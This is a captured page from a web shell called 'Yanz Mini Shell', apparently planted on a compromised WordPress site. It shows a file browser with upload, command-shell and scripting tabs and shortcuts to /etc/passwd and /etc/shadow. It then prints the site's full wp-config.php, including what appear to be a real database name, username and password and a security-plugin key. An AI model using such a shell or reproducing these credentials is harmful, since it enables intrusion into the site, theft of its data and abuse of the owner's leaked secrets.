Yanz Mini Shell
[_]
[-]
[X]
[
HomeShell 1
] [
HomeShell 2
] [
Upload
] [
Command Shell
] [
Scripting
] [
About
]
[ Directory ] =>
/
home
vdataprod
public_html
wp-content
Action
[*]
New File
[*]
New Folder
Sensitive File
[*]
/etc/passwd
[*]
/etc/shadow
[*]
/etc/resolv.conf
[
Delete
] [
Edit
] [
Rename
] [
Back
]
<?php //Begin Really Simple Security key define('RSSSL_KEY', 'RfsmdjSkDJYZUkLge9doWbRqWiLZ9hIpP7oIPYhsNb1L1YWgZP1IitpBg6Nv4tHT'); //END Really Simple Security key /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the * installation. You don't have to use the web site, you can * copy this file to "wp-config.php" and fill in the values. * * This file contains the following configurations: * * * MySQL settings * * Secret keys * * Database table prefix * * ABSPATH * * @link https://codex.wordpress.org/Editing_wp-config.php * * @package WordPress */ // ** MySQL settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define('DB_NAME', 'vdataprod_site'); /** MySQL database username */ define('DB_USER', 'vdataprod_user'); /** MySQL database password */ define('DB_PASSWORD', 'e6gTjN3w1aju'); /** MySQL hostname */ //define('DB_HOST', 'localhost:3306'); define('DB_HOST', 'localhost'); /** Database Charset to use in creating database tables. */ define('DB_CHARSET', 'utf8'); /** The Database Collate type. Don't change this if in doubt. */ define('DB_COLLATE', ''); /**#@+ * Authentication Unique Keys and Salts. * * Change these to different unique phrases! * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service} * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again. * * @since 2.6.0 */ define('AUTH_KEY', 'put your unique phrase here'); define('SECURE_AUTH_KEY', 'put your unique phrase here'); define('LOGGED_IN_KEY', 'put your unique phrase here'); define('NONCE_KEY', 'put your unique phrase here'); define('AUTH_SALT', 'put your unique phrase here'); define('SECURE_AUTH_SALT', 'put your unique phrase here'); define('LOGGED_IN_SALT', 'put your unique phrase here'); define('NONCE_SALT', 'put your unique phrase here'); /**#@-*/ /** * WordPress Database Table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'qygv_'; /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the Codex. * * @link https://codex.wordpress.org/Debugging_in_WordPress */ define('WP_DEBUG', false); /* That's all, stop editing! Happy blogging. */ /** Absolute path to the WordPress directory. */ if ( !defined('ABSPATH') ) define('ABSPATH', dirname(__FILE__) . '/'); /** Sets up WordPress vars and included files. */ require(ABSPATH . 'wp-settings.php'); // Mudando a revisão de Posts if (!defined('WP_POST_REVISIONS')) { define('WP_POST_REVISIONS', 3); } // Controlar Lixeira if (!defined('EMPTY_TRASH_DAYS')) { define('EMPTY_TRASH_DAYS', 3); } // Desativando edição de arquivos pelo Admin // define( 'DISALLOW_FILE_EDIT', true ); // define( 'DISALLOW_FILE_MODS', true ); # Desativar todos os Updates Automaticos: if (!defined('AUTOMATIC_UPDATER_DISABLED')) { define('AUTOMATIC_UPDATER_DISABLED', true); } # Desativar todos os Updates de Core: if (!defined('WP_AUTO_UPDATE_CORE')) { define('WP_AUTO_UPDATE_CORE', false); } #Ativando Cache do Wordpress if (!defined('WP_CACHE')) { define('WP_CACHE', true); // enable the cache } if (!defined('ENABLE_CACHE')) { define('ENABLE_CACHE', true); // enable the cache } if (!defined('CACHE_EXPIRATION_TIME')) { define('CACHE_EXPIRATION_TIME', 3600); // in seconds } // Tempo do AutoSave if (!defined('AUTOSAVE_INTERVAL')) { define('AUTOSAVE_INTERVAL', 30); } ?>
Free Space : 108531933184 Byte